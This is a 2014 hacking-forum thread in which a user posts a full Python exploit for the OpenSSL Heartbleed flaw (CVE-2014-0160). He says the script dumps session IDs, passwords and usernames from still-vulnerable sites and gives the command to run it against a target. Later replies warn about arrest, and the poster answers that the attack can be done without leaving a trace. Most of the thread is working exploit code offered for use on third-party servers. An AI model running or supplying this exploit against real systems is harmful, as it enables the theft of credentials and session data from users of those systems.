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OpenSSL HeartBleed Exploit & Vuln Checker - Civil - 04-19-2014 OpenSSL HeartBleed Exploit I know this shit's kinda old now, but quite a few sites I've been able to find that are still vulnerable to the exploit, the script needs to be compiled and ran through python, if you don't know how to compile and run the script, this isn't for you. I understand the exploit is old, but this python script has been modified to accept different types of TSL/SSL data and also creates a dump of all the collected data (session ids, passwords, users, etc). Check For Vuln Sites: http://filippo.io/Heartbleed/ Python Exploit Code: Code: #!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols
# The authors disclaim copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', type='string', default='', help='STARTTLS protocol: smtp, pop3, imap, ftp, or xmpp')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=4):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
BUFSIZ = 1024
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
s.connect((args[0], opts.port))
if opts.starttls != '':
print 'Sending STARTTLS Protocol Command...'
if opts.starttls == 'smtp':
s.recv(BUFSIZ)
s.send("EHLO openssl.client.net\n")
s.recv(BUFSIZ)
s.send("STARTTLS\n")
s.recv(BUFSIZ)
if opts.starttls == 'pop3':
s.recv(BUFSIZ)
s.send("STLS\n")
s.recv(BUFSIZ)
if opts.starttls == 'imap':
s.recv(BUFSIZ)
s.send("STARTTLS\n")
s.recv(BUFSIZ)
if opts.starttls == 'ftp':
s.recv(BUFSIZ)
s.send("AUTH TLS\n")
s.recv(BUFSIZ)
if opts.starttls == 'xmpp': # TODO: This needs SASL
s.send("<stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' to='%s' version='1.0'\n")
s.recv(BUFSIZ)
print 'Sending Client Hello...'
s.send(hello)
print 'Waiting for Server Hello...'
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()Basic Command: Code: >>> ./heartbleed.py vulnsite.comRE: OpenSSL HeartBleed Exploit & Vuln Checker - Satan - 04-19-2014 Also note that you can be arrested related to using this on sites you are not authorized to. As a precaution. RE: OpenSSL HeartBleed Exploit & Vuln Checker - Civil - 04-19-2014 (04-19-2014, 06:39 AM)Satan Wrote: Also note that you can be arrested related to using this on sites you are not authorized to. As a precaution. That might be true but, it isn't difficult to preform the attack and not leave a trace. Re: RE: OpenSSL HeartBleed Exploit & Vuln Checker - Satan - 04-19-2014 (04-19-2014, 08:35 AM)Civil Wrote: That might be true but, it isn't difficult to preform the attack and not leave a trace. Yeah. It is a possibility though, so I'm just making sure people know the possible risk, however slight it may be if done properly. RE: OpenSSL HeartBleed Exploit & Vuln Checker - superMAUS - 05-06-2014 (04-19-2014, 06:39 AM)Six Wrote: Also note that you can be arrested related to using this on sites you are not authorized to. As a precaution. What an odd thing to say... Spoiler:
Considering that applies to every tutorial in this forum. Re: RE: OpenSSL HeartBleed Exploit & Vuln Checker - Satan - 05-06-2014 (05-06-2014, 10:54 PM)vegimite Wrote: What an odd thing to say... Some people had talked to me about it over Skype and were implying its a method that is impossible to be arrested for because it doesn't log, when someones already been arrested relating to it. So thats why. |